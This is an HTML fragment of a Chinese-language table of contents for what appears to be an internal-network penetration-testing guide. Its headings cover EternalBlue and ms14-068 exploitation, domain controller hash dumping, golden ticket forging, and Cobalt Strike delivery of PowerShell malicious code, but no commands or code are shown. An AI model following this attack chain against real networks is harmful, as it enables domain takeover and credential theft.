        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21063"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.3. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域信息收集</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21063 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">16</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21064"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.4. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">终端设置乱码</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21064 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">18</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21065"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.5. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">终端执行命令信息收集命令</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21065 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">18</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21066"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.6. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取登录过的用户信息</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21066 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">19</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21067"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.7. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">添加路由渗透</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">DC </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21067 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">20</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21068"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.8. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">开启代理</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21068 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">20</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21069"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.9. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">设置</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">porychanins </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">代理</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">nmap </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">扫描</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21069 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">22</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21070"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.10. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">永恒之蓝</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">ms17_010 </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">进行溢出</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.......................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21070 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">24</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21071"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.11.ms14-068 </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">的条件</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21071 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">24</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21072"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.12. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">开启远程桌面</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21072 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">24</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21073"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.13.ms14-068 </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">提权域控</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.............................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21073 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">26</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21074"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.14. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控权限</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21074 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">27</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21075"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.15. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控哈希明文</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21075 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">29</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21076"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.16. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">抓域控全部</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">hash</span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21076 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">30</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21077"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;font-family:Cambria,serif;text-decoration:none;text-underline:none;">.1.17. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">制作黄金票据</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21077 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">30</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21078"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.18. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">ntml sid rid</span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21078 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">31</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21079"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;font-family:宋体;text-decoration:none;text-underline:none;">.1.19. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">窃取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控超级管理权限</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21079 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">31</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21080"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.20. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">生成黄金票据</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21080 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">31</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21081"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;font-family:宋体;text-decoration:none;text-underline:none;">.1.21. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">注入黄金票据</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21081 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">31</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21082"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">cobaltstrike </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">进行内网域渗透</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21082 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">32</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21083"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">建立</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">teamserver</span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21083 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">32</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21084"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.2. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">在</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">服务器上执行下载</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">poershell </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">恶意代码</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21084 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">32</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21085"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.3. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">设置间隔时间</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21085 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">33</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21086"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.4. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">hash </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取域内信任主机</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.............................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21086 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">33</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21087"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.5. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">扫描域内主机</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21087 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">34</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
